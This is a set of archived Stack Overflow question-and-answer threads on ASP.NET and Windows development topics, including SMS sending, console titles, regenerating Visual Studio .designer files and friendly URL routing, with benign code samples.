Q: ASP.NET and sending SMS/making phone calls I have a scenario where I need to make a call to a telephone(landline/mobile) or send SMS to a particular set of users only using ASP.NET and C#. The web application is not a mobile application.
How do I go about doing these? What typically would be the hardware requirements? I would be extremely grateful if you could provide me with pointers and reference websites.
A: Most carriers provide an email address that you can send text messages to — for example, with Verizon, you can send an email to [email protected] and it will show up as a text message to that number.
Wikipedia has a full list of the carrier-provided email addresses.
By sending text messages as "emails" you can take advantage of System.Net.Mail and the like.
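A minimal sketch using System.Net.Mail (the addresses and SMTP host are placeholders; substitute the recipient's carrier gateway and your own mail server):
using System.Net.Mail;

class SmsDemo
{
    static void Main()
    {
        // from, to, subject, body -- the body becomes the text message
        MailMessage message = new MailMessage(
            "alerts@example.com",
            "5551234567@vtext.com",
            "",
            "Your report is ready.");

        SmtpClient client = new SmtpClient("smtp.example.com");
        client.Send(message);
    }
}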
A: Not sure if you're looking for hardware solutions to automate yourself, or external services. However, I've used BT's Web21C pretty extensively.
They have an excellent .Net API and a host of functionality. Their pricing is the best in the UK, but might fall down with US SMS, which is obviously cheaper - there are plenty of other SMS API providers though.
What BT do offer, which is rare, is an API interface for automating call dialling, conferencing and managing call flow.
A: What exactly do you mean by "make a call"? Do you just need to call someone to transfer them or make your own custom, interactive automated call?
If you just need to make a simple call to transfer someone, there are services like VoiceStar that can do this. If you need to make a custom automated call, I would suggest OCS 2007 Speech Server. Asterisk is a SIP PBX and may or may not work for you depending on exactly what you're trying to do.
As far as sending text messages goes, I don't have much experience, so other answers would probably be better.
A: Take a look at Twilio. You can find the .NET/C# helper library on GitHub.
A: Via WebServiceX, you can send SMS messages anywhere in the world. For phone calls I'd use Asterisk.
A: If it's for the UK, then Esendex provides a nice web service, although BT's Web21C does seem to be that little bit cheaper.
A: messagepub, provides a single interface API to send not just SMS and make phone calls, but also IM, Twitter, and email messages. It might help you solve your problem.
They have a C# helper library that you could use to easily integrate multichannel messaging into your application.
A: For Turkish developers: http://www.mutlusms.com/yazilimgelistiriciler.html
A: I built one a while back using an SMS gateway server. This was done in .NET 1.1, ASP.NET & VB.NET. If I remember correctly, I built a simple webpage and posted my request to the SMS gateway server via HTTP POST.
The webpage carried a simple textbox and a button to submit. Once that was done, it posted the message. The packet included a username & password for authentication & the SMS message.
Hope this helps.
A: I do not know much about calls but a very good API is available for free in Pakistan for sending and receiving sms easily. I gave it a try and my application is working great!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45293",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: How to change the Title of the command prompt window How can I change the title of the command prompt window, in C, every time I execute a DOS-based program by double-clicking it? Should I use the Windows API?
A: Try SetConsoleTitle.
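A minimal sketch (the title text is arbitrary):
#include <windows.h>

int main(void)
{
    /* Changes the title of the console window hosting this program. */
    SetConsoleTitle(TEXT("My Program - processing..."));
    Sleep(3000); /* pause so the new title is visible */
    return 0;
}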
A: title allows to set this:
title Windows Title (quotes unneeded)
A: You can do
%comspec% /c start "testtest" %comspec%
in the Run dialog (Windows+R).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45301",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Visual studio 2005 closes slowly I experience that on several different machines, with plugins, without plugins, with VB.net or c# solutions of many different sizes, closing the solution in VS 2005 generally takes significantly more time than actually building the solution.
This has always been the case for me since I started using Visual Studio 2005, so I have learned to live with it, but I am curious:
What on earth is visual studio doing when you have actually told it to shut down? Is it significant? Is it configurable, can you turn it off?
A:
What on earth is visual studio doing
when you have actually told it to shut
down?
You can use Process Monitor from Sysinternals. It may be caused by some plugins. Try resetting your Visual Studio settings (Tools->Import and Export Settings->Reset All Settings).
A: I've found that closing all the open documents before you close the solution helps speed it up. Or maybe it's just a perception thing, but it seems faster :)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45313",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How do you force Visual Studio to regenerate the .designer files for aspx/ascx files? Sometimes when I'm editing page or control the .designer files stop being updated with the new controls I'm putting on the page. I'm not sure what's causing this to happen, but I'm wondering if there's any way of forcing Visual Studio to regenerate the .designer file. I'm using Visual Studio 2008
EDIT: Sorry I should have noted I've already tried:
*
*Closing & re-opening all the files & Visual Studio
*Making a change to a runat="server" control on the page
*Deleting & re-adding the page directive
A: I use the following method which works everytime:
*
*Select all of the code-in-front (html markup etc) in the editor of the aspx/ascx file.
*Cut.
*Save.
*Paste.
*Save.
Recompile.
A: I recently saw that I was having the same problem. Visual Studio 2010 was refusing to update the designer file.
As it turns out, VS doesn't modify the designer file for a page that uses CodeFile (compiled at runtime from the page) instead of CodeBehind (compiled into the project DLL). This is true no matter how many times you close VS, reload the project, re-create the control(s), or modify a file. Nothing would prompt VS to regenerate the designer. It's as if it doesn't create the designer file for CodeFile pages but does require it to be there.
I changed it to CodeBehind and saved the page. The designer file updated immediately. Then I just changed it back and everything was still golden. This behavior seems to be new with VS 2010 / .NET 4.0 as VS 2008 by default didn't suffer from this.
It's this part:
<%@ Page Language="vb" AutoEventWireup="false" CodeFile="YourPage.aspx.vb" Inherits="YourPageClass" %>
Change CodeFile to CodeBehind, save, and then revert.
A: I often found that copy/pasting caused this behaviour for me. Most cases can be solved by editing the ID of a server control (just add a character, then delete it).
Also remember that control inside things like Repeaters aren't visible in the designer file.
And yes, there are cases where you need to do the delete-the-file magic listed above - but the name-change solution will work most of the time.
A: My experience is that if you want to do it like in the article mentioned above, your markup file (aspx/ascx) has to include the CodeBehind="MyPage.aspx.cs" attribute or else it won't work. I blogged about it here.
A: I've found a way to solve this problem without changing any code or running commands like "Convert to Web Application" - and it's simple too!
What I found was that restarting Visual Studio often solves the problem, but sometimes it doesn't. In those cases, if you close Visual Studio and then delete all content in the "obj" directory for the web project before you open it again, it has always worked for me.
(when started again you just add a space and remove it again and then hit save to have the designer file properly regenerated)
A: (The following comes from experience with VS2005.)
If you edit an ASPX page while debugging, then the codebehind doesn't get updated with the new classes. So, you have to stop debugging, trivially edit the ASPX page (like add a button or something), then click Design View, then delete the button. Then, your designer files should be updated.
If you are having a different issue with VS2008, then I can't help.
A: When you are in design view, right click on the screen and hit refresh.
A: Another thing which worked was -
*
*Manually delete and then create a designer file in the filesystem.
*Edit Project file.
*Add code to include designer
Eg: <Compile Include="<Path>\FileName.ascx.designer.cs">
<DependentUpon>FileName.ascx</DependentUpon>
</Compile>
*Reload Project
*Open as(c/p)x file in design/view mode & save it.
*Check designer file. Code will be there.
A: There is another possibility: You may have an error in your .aspx file that does not allow Visual Studio to regenerate the designer.
If you switch to Design View, it will show the control as unable to be rendered. Fixing the control (in my case it was an extra quote in the properties) and recompiling should regenerate the designer.
A: If you open the .aspx file and switch between design view and html view and
back it will prompt VS to check the controls and add any that are missing to
the designer file.
In VS2013-15 there is a Convert to Web Application command under the Project menu. Prior to VS2013 this option was available in the right-click context menu for as(c/p)x files. When this is done you should see that you now have a *.Designer.cs file available and your controls within the Design HTML will be available for your control.
PS: This should not be done in debug mode, as not everything is "recompiled" when debugging.
Some people have also reported success by (making a backup copy of your .designer.cs file and then) deleting the .designer.cs file. Re-create an empty file with the same name.
There are many comments to this answer that add tips on how best to re-create the designer.cs file.
A: If you are using VS2013 or later, make sure that the code-behind is referenced with the "CodeBehind" attribute, not "CodeFile", then follow the steps below:
<%@ Control Language="C#" AutoEventWireup="true" CodeBehind="yourControl.ascx.cs" Inherits="yourControl.yourControl" %>
*
*create an empty designer page (or clear it if it already exists: "yourControl.ascx.designer.cs")
*in the ascx (or aspx) copy all the code, then delete it, then save. Re-paste it again, then save.
*the designer file should be populated now.
A: Most of the solutions here don't work if you're running Visual Studio 2013 and possibly 2012. Microsoft probably introduced some optimizations to make the IDE snappier, consequently they've reduced the number of cases that trigger the code generator. The following scenarios that used to work no longer do:
*
*Delete the aspx or ascx file -- No longer checks for this case
*Cut all the content and repaste into the aspx or ascx file -- No longer works, no change in the references
*Convert to Web Application -- Option no longer available
*Arbitrarily changing content on the aspx/ascx file -- No longer works (see 2).
The solution is surprisingly simple, but it's slightly cumbersome. In order to trigger the code generator, change something that would require the designer.aspx.cs to be generated. Changing content that doesn't affect code, such as a CSS style or adding text, won't trigger the code generator. You must change a referenced control. Here's how to do it:
In the ascx or aspx change the ID of the control
<asp:HyperLink ID="MyLink" runat="server" NavigateUrl="~/Default.aspx" Text="Home" />
to
<asp:HyperLink ID="theLINK" runat="server" NavigateUrl="~/Default.aspx" CssClass="tab" Text="Home" />
Go to the ascx.cs or aspx.cs and make sure you rename all references to "MyLink" to "theLINK" as well. Save and do build and the you should be good to go.
A: *
*Select-all in the designer file and delete everything in the file, leaving it blank and then save
*Select-all in the ASPX/ASCX file and cut everything and then re-paste it back
*The designer file should have regenerated the code
A: Here is what I experienced:
Right-click the website folder in the Solution Explorer and select Convert to Web Application; for every aspx file, a designer file will be generated.
Sameer
A: The solution that worked for me is:
I just copied the page and pasted it in the same location, then renamed the first page (to whatever name) and renamed the copied page to the original page's name. Now the controls are accessible.
A: Just to add to the long list of answers here - I've just run into this issue in VS2010 (SP1) with an .aspx file. I tried adding and removing standard ASP controls (which has worked in the past) but in the end, I had to remove one of the runat=server lines from an existing control (and save) to force the designer file to regenerate.
A: I've encountered the same problem for years now, working in Visual Studio 2008. And I've tried every "solution" on StackOverflow and dozens of blogs, just like I'm sure all of you have. And sometimes they work, and sometimes they don't, just like I'm sure all of you have encountered. And apparently it's still an issue in VS2010 and VS2012.
So finally, a couple of months ago, I decided enough was enough, and over a few weeks I built a tool called "Redesigner" that generates .designer files. It's open-source under the BSD license, with the source code available on SourceForge — free to use, free to steal, free to do anything you please with. And it does what Visual Studio fails to do so often, which is generate .designer files quickly and reliably.
It's a stand-alone command-line tool that parses .aspx and .ascx files, performs all the necessary reflection magic, and spits out correct .designer files. It does all the parsing and reflection itself to avoid relying on existing code, which we all know too well is broken. It's written in C# against .NET 3.5, but it takes pains to avoid using even System.Web for anything other than type declarations, and it doesn't use or rely on Visual Studio at all.
Redesigner can generate new .designer files; and it offers a --verbose option so that when things go wrong, you get far better error messages than "Exception of type System.Exception was thrown." And there's a --verify option that can be used to tell you when your existing .designer files are broken — missing controls, bad property declarations, unreadable by Visual Studio, or otherwise just plain borked.
We've been using it at my workplace to get us out of jams for the better part of the last month now, and while Redesigner is still a beta, it's getting far enough along that it's worth sharing its existence with the public. I soon intend to create a Visual Studio plugin for it so you can simply right-click to verify or regenerate designer files the way you always wished you could. But in the interim, the command-line usage is pretty easy and will save you a lot of headaches.
Anyway, go download a copy of Redesigner now and stop pulling out your hair. You won't always need it, but when you do, you'll be glad you have it!
https://sourceforge.net/projects/redesigner/
A: TL;DR;
Edit the Inherits attribute of the ASPX page's @Page directive and hit Save. Your designer file should be regenerated.
Ensure that Inherits = <namespace>.<class_name> and CodeBehind = <class_name>.aspx.cs
I was trying to do this on a Sharepoint 2010 project, using VS 2010 and TFS, and none of the solutions above worked for me. Primarily, the option, "Convert to Web Application" is missing from the right-click menu of the .ASPX file when using TFS in VS 2010.
This answer finally helped. My class looked like this:
namespace MyProjects.Finance.Pages
{
public partial class FinanceSubmission : WebPartPage
{
protected void Page_Load(object sender, EventArgs e)
{
}
// more code
}
}
And my @Page directive was (line-breaks here for clarity):
<%@ Page Language="C#" AutoEventWireup="true"
CodeBehind="FinanceSubmission.aspx.cs"
Inherits="MyProjects.Finance.Pages.FinanceSubmission"
MasterPageFile="~masterurl/default.master" %>
I first changed the Inherits to MyProjects.Finance.Pages, hit Save, then changed it back to MyProjects.Finance.Pages.FinanceSubmission and hit Save again. And wallah! The designer page was regenerated!
Hope this helps someone using TFS!
A: Within the Visual Studio:
1) Remove your aspx.designer.cs file
2) Right click on your aspx file and select "Convert to Web Application"
This should add the aspx.designer.cs file back and bring it up to date.
If you get an error saying:
"Generation of designer file failed: The method or operation is not implemented."
Try close Visual Studio and then reopen your project and do step number two again
How to generate aspx.designer.cs in visual studio?
A: in solution explorer just right click and select convert to web application. It will generate all the designer files again.
A: *
*Step 1: Select all your aspx code, Cut [ CTRL+X ] that code and Save.
*Step 2: Again paste the same code in the same page and save again
Now your .designer page will be refreshed with all the controls on the .aspx page.
A: the only way I know is to delete the designer file, and do a convert to web app. However when you do this, it usually pops up with the error, as to why it didn't auto-regen in the first place, its usually a control ref that isn't declared in the head of the page.
A: Well I found a solution that works, though I don't really like it. I had to delete the .designer.cs file then recreate an empty file with the same name. When I went back in and saved the aspx file again, the designer file was re-generated.
Dodgy!
A: Convert to Web Application did not work for me.
Deleting designer.cs and pasting a blank designer.cs did not work either.
But yes this worked:
*
*Select all(Default.aspx)
*Cut
*Save Default.aspx
*Paste
*Save Default.aspx
Done. New designer.cs generated. :)
A: Delete the designer.cs file and then right click on the .aspx file and choose "Convert To Web Application". If there is a problem with your control declarations, such as a tag not being well-formed, you will get an error message and you will need to correct the malformed tag before visual studio can successfully re-generate your designer file.
In my case, at this point, I discovered that the problem was that I had declared a button control that that was not inside of a form tag with a runat="server" attribute.
A: This is a bug in the IDE; I've seen it since VS 2003. The solution is simple though.
Save your files. Completely exit the IDE (make sure the process stops; check Task Manager).
Reopen the solution, dirty the markup, save. Fixed.
A: I had two problems... an outdated AjaxControlToolkit: I deleted the old DLL, removed the old controls from the toolbox, downloaded the new version, loaded the toolbox, and dragged and dropped the new controls onto the page (see http://www.experts-exchange.com/Programming/Languages/.NET/Visual_Studio_.NET_2005/Q_24591597.html)
I also had a misspelling in my label control (I had used 'class' instead of 'cssclass').
Ta
A: If you are like me and you add old .ASPX files to a more recent project, you are probably going to forget some of the controls used on the page.
If so, and there are multiple files you are installing, fix one at a time.
When you compile, fix the errors generated. They will probably be the same errors in all the files.
Next, if you have designer files, delete all of the inserted designer files.
Then make sure there are no other errors when you compile, other than the ones about the designer files.
Finally, right-click your web project and click on Convert to Web Application.
This will insert the designer files you need.
These are the absolute best steps to fix the issues.
A: I had the problem that my new controls would not be generated in the designer file when declared in the .ascx file. The problem was that I had declared them in the code-behind also, so deleting the declaration in the code-behind solved my problem.
A: One thing that nobody's mentioned is to visit the page. I had my designer file stop regenerating because I was including a user control that didn't exist (for various reasons), and none of the things suggested here worked. For whatever reason, I didn't get any errors in Visual Studio - besides the one complaining about the fact that my client-side controls didn't exist because they weren't being regenerated, of course.
It took actually visiting the page to get ASP.Net to tell me the error.
A: This can also happen if you update the namespace and don't update the namespace in the designer file. Fix: Update the namespace in the designer file too.
A: The solution for me was to change from None to Compile in the .csproj file:
<Compile Include="Logout.aspx.designer.cs">
<DependentUpon>Logout.aspx</DependentUpon>
</Compile>
A: *
*replace your custom tag with an invalid tag name. Save it.
*restore the invalid tag name back to the custom tag name. Save it. Then you will be prompted to check out the *.designer.cs files (or VS will silently modify the designer.cs) and the correct variable for the custom tag control will be produced.
A: I had this problem and for me, I had a space in one of my ID values for one of my controls. I took the space out and the designer file regenerated itself.
A: In my case I was just missing a register TagPrefix at the top. Somehow the previous dev worked without having this in there?
A: I have had this issue before. I usually just hit enter to add a line and then wait for the plus/minus to show on the html page and the designer should add what you need. I have also had to close the project and reopen it to get it to work.
A: I've had this problem a lot, and just did again. I tried fixing it using these suggestions, and nothing worked. I finally found that I had the 'Title' attribute in the page header twice (I added one to the end, not realizing that VS added a blank Title="" to the beginning). Removing the extra attribute caused VS2008 to re-generate the designer file... I hope VS2010 fixes this problem, letting us know why the designer file generation isn't happening...
--
Derek
A: Apart from all the good answers already given, I'd like to add to @johan-leino's great answer. In my case, for some arbitrary reason, the CodeBehind attribute was omitted from the @Page directive/.aspx file. Likewise, it might be worthwhile to check the CodeFile attribute for @Control directives/.ascx files (obviously in conjunction with an Inherits attribute in both cases).
Depending on the exact scenario and reason required to 'force' a regenerate of .designer.cs, one could also try to format the document (potentially indicating a parsing error) before (quick) saving (regardless whether there were any changes or not) and check the Error List for warnings.
A: In my case, it was fixed when I added a CodeBehind to the @Page section.
A: I know I'm late to the party, but I thought if after trying the accepted answer by @Glenn Slaven and the current highest rated answer by @Espo you are still out of luck, the following might save some people out there some trouble.
User Controls (.ascx) are what constantly stop auto-generating for me. I've found that in the instances where I use other User Control(s) in my User Control, it breaks the auto-generation.
The solution I came up with was to use the trick we all know of for getting IntelliSense to work in User Controls or Skin files when using CSS classes from external sources. Instead of just referencing the CSS file, now I Register the other User Control(s) that I need. It looks something like this:
<% If False Then %>
<%@ Register TagPrefix="uc" TagName="Title" Src="~/controls/title.ascx" %>
<link rel="stylesheet" type="text/css" href="../css/common.css" />
<% End If %>
After that, I Save the file, which prompts the auto-generation to regenerate, and I'm back up and running.
A: I know this is an old topic but I just wanted to add a solution that wasn't suggested yet.
I had the same problem with a resource file. I edited it outside Visual Studio and the designer file hadn't updated properly.
Renaming the file did the trick of regenerating the Designer file. I just renamed it to the initial name again and that worked just fine!
A: I'm in VS 2003 and none of these worked for me. What worked was to open the code at the top of the .vb page in the section labeled Web Form Designer Generated Code (the part that says not to edit there) and declare it there, where the system declared all the other controls. Bizarre.
A: For VS2015... here's a VB example for switching from a WebSite project to a Web Application Project that worked for me. None of the other solutions worked for me, which is why I'm sharing this. It's not elegant, but works.
Step 0: Replace all " CodeFile=" with " CodeBehind=" in your project
Step 1: Close the Solution.
Step 2: Run a home-grown Windows app with the following code (below steps).
Step 3: Re-open the solution.
Step 4: In Solution Explorer, make sure you are Showing All Files, and search for designer.vb (or designer.cs for C#)
Step 5: Select all the missing files, and include them in your project.
Step 6: For each file, view the main page / control and save it.
private void button1_Click(object sender, EventArgs e)
{
ProcessDirectory(new DirectoryInfo(textBox1.Text));
}
private void ProcessDirectory(DirectoryInfo directory)
{
ProcessMask(directory, ".ascx", ".vb");
ProcessMask(directory, ".aspx", ".vb");
foreach (DirectoryInfo directoryInfo in directory.GetDirectories())
ProcessDirectory(directoryInfo);
}
private void ProcessMask(DirectoryInfo directory, string maskStart, string maskEnd)
{
FileStream fs;
foreach (FileInfo file in directory.GetFiles(string.Format("*{0}{1}", maskStart, maskEnd)))
{
string designerFileName = file.Name.Replace(string.Format("{0}{1}", maskStart, maskEnd), string.Format("{0}.designer{1}", maskStart, maskEnd));
if (directory.GetFiles(designerFileName).Length == 0)
{
using (fs = File.Create(Path.Combine(directory.FullName, designerFileName)))
{
fs.Close();
}
}
}
}
A: I thought I had this problem and was tearing my hair out, but then I realised that I was trying to reference a control from a static method.
Making the method non-static resolved the issue for me.
A: *
*Close designer.cs.
*Change your aspx file to design view.
*Right-Click –> Refresh.
*Save
A: One of my solutions, which works for me:
*
*Close the Visual Studio
*Remove hidden .vs directory
*Remove existing .sln file
*load the project in visual studio using .csproj file
A: In Visual Studio 2019 below are the steps:
*
*Create webform1.aspx
*Copy your aspx code and paste in webform1.aspx
*Compile your project you should have designer code inside webform1.aspx.designer.cs
*Now you can copy designer code and use in your original webform.
A: If you see this while using Visual Basic 2019 and you clicked on the "permanently delete this file" confirmation, you can recover the designer.cs files from your recycle bin...it will regenerate in Visual Basic automatically. I just did it and found my file just as it was.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45325",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "423"
} |
Q: MS Visual Studio "Package Load Failure" error I'm receiving "Package Load Failure" error when I open VS 2005 after I installed the latest VisualSVN (v. 1.5.2). Anyone facing this error? Is there any tool out there to help identify which package didn't load and/or help unload a specific package?
A: Installing the Visual Studio SDK will install the "Package Load Analyzer" package. This allows you to see what package failed to load and why.
A: There should be VisualSVN log files in your temp folder (somewhat like
"C:\Documents and Settings\\Local
Settings\Temp\VisualSVN-2007-06-02-00-01-416.log").
Do you see anything in that file that helps?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45331",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: Why is my web control null? I have a web site in asp.net that uses a master page. In this master page I have a multiview control with one view that has all the content for the content pages and one view that has some local content to the master page where I show error messages from all content pages.
In this error view I have a asp.net Label control that displays the error messages. Usually the label works fine, but in some few cases the label is null, which renders a NullReferenceException. Now I have handled this case by checking if the label is null before using it, but still my question is:
Why is this label null? What are the circumstances that can generate this?
EDIT: In the master page I have a method called SetErrorText that takes a string and sets the label. I'm calling this method from the content pages' Page_Load method, and this generally works fine. In all but two cases (that I've discovered so far) the label is initialised, and nothing separates these two cases from all the ones that work.
Also, all other controls in the master page are initialised, such as the View-control that houses the label.
When the Page_Load of a content page rolls around, the master page should be populated.
A: It seems that the problem was one of sloppiness. Someone had forgotten to delete the auto-generated Content-controls that Visual Studio throws in on all content pages where the master page has a ContentPlaceHolder-control.
If a content page has a Content-control, all controls that are placed in the ContentPlaceHolder-control on the master page will be null, it seems.
A: What method on the master page are you accessing the label from? Depending on the stage of the page lifecycle, the label control may not have been loaded yet
A: Could you be accessing it before it is created? Check the page lifecycle: http://msdn.microsoft.com/en-us/library/ms178472.aspx
A: I had a very similar error. In my case it was caused by .NET compiler wierdness related to the control designer file. Even if the designer file has the controls defined correctly, delete it, re-generate it and rebuild (make sure to rebuild, don't just 'build'). See the top answer here for how to do regenerate the designer file:
How do you force Visual Studio to regenerate the .designer files for aspx/ascx files?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45339",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Friendly URLs for ASP.NET Python frameworks always provide ways to handle URLs that convey the data of the request in an elegant way, like for example http://somewhere.overtherainbow.com/userid/123424/
I want you to notice the ending path /userid/123424/
How do you do this in ASP.NET?
A: This is an alternative example that also uses ASP.NET Routing to implement friendly URLs.
Examples of the mappings that the application handles are:
http://samplesite/userid/1234 - http://samplesite/users.aspx?userid=1234
http://samplesite/userid/1235 - http://samplesite/users.aspx?userid=1235
This example does not use querystrings but requires additional code on the aspx page.
Step 1 - add the necessary entries to web.config
<system.web>
<compilation debug="true">
<assemblies>
…
<add assembly="System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</assemblies>
</compilation>
…
<httpModules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
</httpModules>
</system.web>
<system.webServer>
…
<modules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers>
…
<add name="UrlRoutingHandler" preCondition="integratedMode" verb="*" path="UrlRouting.axd" type="System.Web.HttpForbiddenHandler, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
</handlers>
</system.webServer>
Step 2 - add a routing table in global.asax
Define the mapping from the friendly URL to the aspx page, saving the requested userid for later use.
void Application_Start(object sender, EventArgs e)
{
RegisterRoutes(RouteTable.Routes);
}
public static void RegisterRoutes(RouteCollection routes)
{
routes.Add("UseridRoute", new Route
(
"userid/{userid}",
new CustomRouteHandler("~/users.aspx")
));
}
Step 3 - implement the route handler
Pass the routing context, containing the parameter, to the page. (Note the definition of IRoutablePage)
using System.Web.Compilation;
using System.Web.UI;
using System.Web;
using System.Web.Routing;
public interface IRoutablePage
{
RequestContext RequestContext { set; }
}
public class CustomRouteHandler : IRouteHandler
{
public CustomRouteHandler(string virtualPath)
{
this.VirtualPath = virtualPath;
}
public string VirtualPath { get; private set; }
public IHttpHandler GetHttpHandler(RequestContext
requestContext)
{
var page = BuildManager.CreateInstanceFromVirtualPath
(VirtualPath, typeof(Page)) as IHttpHandler;
if (page != null)
{
var routablePage = page as IRoutablePage;
if (routablePage != null) routablePage.RequestContext = requestContext;
}
return page;
}
}
Step 4 - Retrieve the parameter on the target page
Note the implemetation of IRoutablePage.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.Routing;
public partial class users : System.Web.UI.Page, IRoutablePage
{
protected RequestContext requestContext;
protected object RouteValue(string key)
{
return requestContext.RouteData.Values[key];
}
protected void Page_Load(object sender, EventArgs e)
{
string id = RouteValue("userid").ToString();
switch (id)
{
case "1234":
lblUserId.Text = id;
lblUserName.Text = "Bill";
break;
case "1235":
lblUserId.Text = id;
lblUserName.Text = "Claire";
break;
case "1236":
lblUserId.Text = id;
lblUserName.Text = "David";
break;
default:
lblUserId.Text = "0000";
lblUserName.Text = "Unknown";
break;
}
}
#region IRoutablePage Members
public RequestContext RequestContext
{
set { requestContext = value; }
}
#endregion
}
A: This example uses ASP.NET Routing to implement friendly URLs.
Examples of the mappings that the application handles are:
http://samplesite/userid/1234 - http://samplesite/users.aspx?userid=1234
http://samplesite/userid/1235 - http://samplesite/users.aspx?userid=1235
This example uses querystrings and avoids any requirement to modify the code on the aspx page.
Step 1 - add the necessary entries to web.config
<system.web>
<compilation debug="true">
<assemblies>
…
<add assembly="System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</assemblies>
</compilation>
…
<httpModules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
</httpModules>
</system.web>
<system.webServer>
…
<modules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers>
…
<add name="UrlRoutingHandler" preCondition="integratedMode" verb="*" path="UrlRouting.axd" type="System.Web.HttpForbiddenHandler, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
</handlers>
</system.webServer>
Step 2 - add a routing table in global.asax
Define the mapping from the friendly URL to the aspx page, saving the requested userid for later use.
void Application_Start(object sender, EventArgs e)
{
RegisterRoutes(RouteTable.Routes);
}
public static void RegisterRoutes(RouteCollection routes)
{
routes.Add("UseridRoute", new Route
(
"userid/{userid}",
new CustomRouteHandler("~/users.aspx")
));
}
Step 3 - implement the route handler
Add the querystring to the current context before the routing takes place.
using System.Web.Compilation;
using System.Web.UI;
using System.Web;
using System.Web.Routing;
public class CustomRouteHandler : IRouteHandler
{
public CustomRouteHandler(string virtualPath)
{
this.VirtualPath = virtualPath;
}
public string VirtualPath { get; private set; }
public IHttpHandler GetHttpHandler(RequestContext
requestContext)
{
// Add the querystring to the URL in the current context
string queryString = "?userid=" + requestContext.RouteData.Values["userid"];
HttpContext.Current.RewritePath(
string.Concat(
VirtualPath,
queryString));
var page = BuildManager.CreateInstanceFromVirtualPath
(VirtualPath, typeof(Page)) as IHttpHandler;
return page;
}
}
Code from users.aspx
The code on the aspx page for reference.
protected void Page_Load(object sender, EventArgs e)
{
string id = Page.Request.QueryString["userid"];
switch (id)
{
case "1234":
lblUserId.Text = id;
lblUserName.Text = "Bill";
break;
case "1235":
lblUserId.Text = id;
lblUserName.Text = "Claire";
break;
case "1236":
lblUserId.Text = id;
lblUserName.Text = "David";
break;
default:
lblUserId.Text = "0000";
lblUserName.Text = "Unknown";
break;
    }
}
A: Here's another way of doing it using ASP.NET MVC
First off, here's the controller code with two actions. Index gets a list of users from the model, userid gets an individual user:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using System.Web.Mvc.Ajax;
namespace MvcApplication1.Controllers
{
public class UsersController : Controller
{
public ActionResult Index()
{
return View(Models.UserDB.GetUsers());
}
public ActionResult userid(int id)
{
return View(Models.UserDB.GetUser(id));
}
}
}
Here's the Index.aspx view; it uses an ActionLink to create links in the correct format:
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Index.aspx.cs" Inherits="MvcApplication1.Views.Index" %>
<%@ Import Namespace="MvcApplication1.Controllers" %>
<%@ Import Namespace="MvcApplication1.Models" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title></title>
</head>
<body>
<div>
<h2>Index of Users</h2>
<ul>
<% foreach (User user in (IEnumerable)ViewData.Model) { %>
<li>
<%= Html.ActionLink(user.name, "userid", new {id = user.id })%>
</li>
<% } %>
</ul>
</div>
</body>
</html>
And here's the userid.aspx view which displays an individual's details:
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="userid.aspx.cs" Inherits="MvcApplication1.Views.Users.userid" %>
<%@ Import Namespace="MvcApplication1.Controllers" %>
<%@ Import Namespace="MvcApplication1.Models" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<div>
<table border ="1">
<tr>
<td>
ID
</td>
<td>
<%=((User)ViewData.Model).id %>
</td>
</tr>
<tr>
<td>
Name
</td>
<td>
<%=((User)ViewData.Model).name %>
</td>
</tr>
</table>
</div>
</body>
</html>
And finally for completeness, here's the model code:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace MvcApplication1.Models
{
public class UserDB
{
private static List<User> users = new List<User>{
new User(){id=12345, name="Bill"},
new User(){id=12346, name="Claire"},
new User(){id=12347, name="David"}
};
public static List<User> GetUsers()
{
return users;
}
public static User GetUser(int id)
{
return users.First(user => user.id == id);
}
}
public class User
{
public int id { get; set; }
public string name { get; set; }
}
}
A: I've been using a URL rewriter by Intelligencia:
http://urlrewriter.net/
It was so easy to configure - maybe an hour to get it all up and running. Very few problems with it...
